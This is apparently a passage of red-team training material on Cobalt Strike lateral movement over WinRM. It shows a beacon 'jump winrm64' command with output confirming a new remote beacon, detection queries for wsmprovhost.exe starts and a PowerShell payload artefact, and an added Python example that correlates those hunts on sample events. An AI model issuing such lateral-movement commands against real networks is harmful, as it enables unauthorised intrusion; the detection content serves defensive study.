Windows Remote Management
The winrm and winrm64 methods can be used for 32 and 64-bit targets as appropriate.
The SMB Beacon is an excellent choice when moving laterally, because the SMB protocol is used extensively in a Windows environment, so this traffic blends in very well.
beacon> jump winrm64 web.dev.cyberbotic.io smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10) on web.dev.cyberbotic.io via WinRM
[+] host called home, sent: 225172 bytes
[+] established link to child beacon: 10.10.122.30
WinRM will return a high integrity Beacon running as the user you are using to interact with the remote machine.
This new Beacon will be running inside wsmprovhost.exe, which is the "Host process for WinRM plug-ins". This is used whenever WinRM is used, legitimate or otherwise. You can search for process start events, but this will produce a lot of false positives if WinRM is being used legitimately by system administrators.
event.category: process and event.type: start and process.name: wsmprovhost.exe
The most likely means of identifying this lateral movement is by searching PowerShell script block logs for known payload artefacts.
event.category: process and powershell.file.script_block_text: "$var_runme.Invoke([IntPtr]::Zero)"
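As an added example (not part of the original course material), the following Python applies the two hunts above to a handful of constructed events using the ECS-style field names from the queries, and then correlates them so that the noisy wsmprovhost.exe process-start rule only raises an alert when a script block containing a known payload artefact follows on the same host. Hostnames, timestamps and the five-minute window are assumptions for illustration.

```python
"""Added example, not from the original page: two hunts for WinRM lateral
movement plus a correlation step that suppresses benign admin activity."""
from datetime import datetime, timedelta

# Artefact taken from the page's script block query; analysts extend this list.
KNOWN_ARTEFACTS = ["$var_runme.Invoke([IntPtr]::Zero)"]

# Constructed sample events (not real telemetry), ECS-style field names.
SAMPLE_EVENTS = [
    {"@timestamp": "2023-01-01T10:00:00", "host": "web", "event.category": "process",
     "event.type": "start", "process.name": "wsmprovhost.exe"},          # admin remoting
    {"@timestamp": "2023-01-01T10:30:00", "host": "web", "event.category": "process",
     "event.type": "start", "process.name": "wsmprovhost.exe"},          # payload host
    {"@timestamp": "2023-01-01T10:30:05", "host": "web", "event.category": "process",
     "powershell.file.script_block_text": "$var_runme.Invoke([IntPtr]::Zero)"},
    {"@timestamp": "2023-01-01T10:31:00", "host": "sql", "event.category": "process",
     "powershell.file.script_block_text": "Get-Service -Name Spooler"},  # benign block
]


def wsmprovhost_starts(events):
    """Hunt 1 (noisy): every wsmprovhost.exe process start."""
    return [e for e in events
            if e.get("event.category") == "process" and e.get("event.type") == "start"
            and e.get("process.name", "").lower() == "wsmprovhost.exe"]


def artefact_hits(events, artefacts=KNOWN_ARTEFACTS):
    """Hunt 2 (high fidelity): script block text containing a known artefact."""
    return [e for e in events
            if any(a in e.get("powershell.file.script_block_text", "") for a in artefacts)]


def correlated_alerts(events, window=timedelta(minutes=5)):
    """Keep only wsmprovhost.exe starts that are followed, on the same host and
    within the window, by an artefact hit. Returns (host, start_ts, hit_ts)."""
    ts = lambda e: datetime.fromisoformat(e["@timestamp"])
    hits = artefact_hits(events)
    alerts = []
    for start in wsmprovhost_starts(events):
        for hit in hits:
            delta = ts(hit) - ts(start)
            if hit["host"] == start["host"] and timedelta(0) <= delta <= window:
                alerts.append((start["host"], start["@timestamp"], hit["@timestamp"]))
    return alerts


if __name__ == "__main__":
    print(len(wsmprovhost_starts(SAMPLE_EVENTS)), "process starts (noisy)")
    print(len(artefact_hits(SAMPLE_EVENTS)), "artefact hits")
    print(correlated_alerts(SAMPLE_EVENTS))
```

The 10:00 start is an administrator's session and is dropped by the correlation, while the 10:30 start is tied to the script block that followed it five seconds later.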